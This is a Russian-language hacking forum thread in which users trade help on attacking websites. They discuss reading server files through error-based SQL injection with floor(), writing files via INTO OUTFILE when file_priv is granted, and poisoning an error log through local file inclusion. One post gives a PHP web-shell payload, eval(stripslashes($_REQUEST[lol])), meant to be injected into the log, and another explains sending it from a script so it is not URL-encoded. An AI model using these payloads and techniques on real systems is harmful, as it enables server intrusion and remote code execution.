а что, www.xxx.com/test1/shell.php не прокатывает ?

есть вопрос насчет floor

сделал запрос чтоб прочест файли на сервере:
норм выводит но когда доходим до 494 символа то ничего не выводит.

через chat_length проверил но там 677021 символов!!!

Остальные файлы тоже читается до 494 символов. Тут на одного запроса пришлос писать 64символов так как floor большего режет. Но поэтапно тоже не больше 494 ((

Правда запрос через хедер идет. Может кто обьяснит?? И вообше тут можно into outfile делать если прав есть?

Именно через floor хочешь? Ведь можно таким методом в подобных условиях лить:

спс за ответ но не очень то понял тебя, в каких условиях гриш? Судя по запросу оно должно дополнят мой запрос? Хотя так не пашет

Когда можно внедрить команды в запрос, и имеется file_priv (естественно кавычки не должны слешироваться)
Обычно такой способ используется в слепых скулях.

есть LFI, нашел еrror.log и access.log, access читать не получается т.к. размер большой, остался только еrror.
Делаю запрос вида http://www.site.com/<? траляля ?>
В лог пишется %3C? траляля ?%3E.
Что же делать?)

<?php file_get_contents('http://lala.com/<?php eval(stripslashes($_REQUEST[lol]));?>');?>

[uri "/%3C?php%20file_get_contents('http://lala.com/%3C?php%20eval(stripslashes($_REQUEST[lol]));?%3E');?%3E"]

ну если ты это в адресную строку прямо все забил, то не удивительно. Ми тебе намекгул как бы, что запрос можно выполнить просто сторонним скриптом, или интекрякерами всякими, как тебе удобнее.

PS: Выполнить запрос сторонним скриптом - это значит выполнить скрипт, а не набирать его код в адресной строке браузера